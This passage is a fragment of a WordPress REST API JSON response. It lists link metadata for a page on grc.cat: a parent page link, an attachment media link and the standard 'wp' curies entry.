,"up":[{"embeddable":true,"href":"https:\/\/www.grc.cat\/es\/wp-json\/wp\/v2\/pages\/2738"}],"wp:attachment":[{"href":"https:\/\/www.grc.cat\/es\/wp-json\/wp\/v2\/media?parent=2744"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}